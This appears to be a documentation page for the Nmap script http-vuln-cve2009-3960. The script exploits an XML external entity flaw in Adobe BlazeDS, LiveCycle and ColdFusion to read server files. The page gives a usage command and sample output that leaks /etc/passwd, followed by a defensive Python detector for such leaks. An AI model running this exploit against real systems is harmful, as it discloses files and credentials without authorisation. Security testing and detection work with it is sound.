http-vuln-cve2009-3960
Script type:
portrule
Script categories:
exploit, intrusive
Script download URL: http://nmap.org/svn/scripts/http-vuln-cve2009-3960.nse
Exploits CVE-2009-3960, also known as Adobe XML External Entity Injection.
This vulnerability allows local files to be read remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0.
For more information see:
Points to the root path. Defaults to "/".
Target file to be read. Defaults to "/etc/passwd".
Usage format
nmap --script=http-vuln-cve2009-3960 --script-args http-vuln-cve2009-3960.root="/root/" <target>
PORT   STATE SERVICE
80/tcp open  http
| http-vuln-cve2009-3960:
|     samples/messagebroker/http
|     <?xml version="1.0" encoding="utf-8"?>
|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash
|     bin:*:1:1:bin:/bin:/sbin/nologin
|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
|     adm:*:3:4:adm:/var/adm:/sbin/nologin
|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
|     sync:*:5:0:sync:/sbin:/bin/sync
|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
|     halt:*:7:0:halt:/sbin:/sbin/halt
|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
|     news:*:9:13:news:/etc/news:
|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
|     operator:*:11:0:operator:/root:/sbin/nologin
|     games:*:12:100:games:/usr/games:/sbin/nologin
|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
|     nobody:*:99:99:Nobody:/:/sbin/nologin
|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
|     ...
|_
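For triaging scan results or inspecting captured message-broker responses, the sketch below checks an AMFX AcknowledgeMessage for passwd-style records and reports which message field carries them. It is an added example, not part of the Nmap script; the function name, the sample documents, and the assumption that values follow `<traits>` in declaration order (as in the output above) are introduced here.

```python
import re
import xml.etree.ElementTree as ET

ACK = "flex.messaging.messages.AcknowledgeMessage"
# passwd(5) record: name:password:UID:GID:GECOS:home:shell
PASSWD = re.compile(r"[A-Za-z_][\w.-]*:[^:]*:\d+:\d+:[^:]*:[^:]*:[^:]*")

def find_passwd_leak(body, min_lines=2):
    """Return {field_name: [passwd records]} for string fields of an
    AMFX AcknowledgeMessage that hold at least min_lines passwd records."""
    data = body.encode("utf-8") if isinstance(body, str) else body
    if b"<!DOCTYPE" in data:  # a response needs no DTD; refuse to parse one
        return {}
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return {}
    hits = {}
    for obj in root.iter("object"):
        children = list(obj)
        if obj.get("type") != ACK or not children or children[0].tag != "traits":
            continue
        names = [t.text for t in children[0]]
        # Assumption: values follow <traits> in declaration order.
        for name, value in zip(names, children[1:]):
            if value.tag != "string" or not value.text:
                continue
            lines = [l.strip() for l in value.text.splitlines()
                     if PASSWD.fullmatch(l.strip())]
            if len(lines) >= min_lines:
                hits[name] = lines
    return hits

# Constructed template: the sample output above, shortened and closed properly.
_TPL = ('<?xml version="1.0" encoding="utf-8"?>'
        '<amfx ver="3"><body targetURI="/onResult" responseURI="">'
        '<object type="flex.messaging.messages.AcknowledgeMessage"><traits>'
        '<string>timestamp</string><string>headers</string>'
        '<string>body</string><string>correlationId</string></traits>'
        '<double>1.325337665684E12</double>'
        '<object><traits><string>DSId</string></traits>'
        '<string>CONSTRUCTED-DSID</string></object>'
        '<null/><string>{}</string></object></body></amfx>')
LEAKY = _TPL.format("root:x:0:0:root:/root:/bin/bash\n"
                    "bin:*:1:1:bin:/bin:/sbin/nologin\n"
                    "daemon:*:2:2:daemon:/sbin:/sbin/nologin")
BENIGN = _TPL.format("CONSTRUCTED-CORRELATION-ID")  # ordinary acknowledgement
```

On the constructed leaky sample the records are attributed to `correlationId`, the field that holds the file contents in the output shown above.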
Author: Hani Benhabiles
License: Compiled by VER007 http://www.ver007.com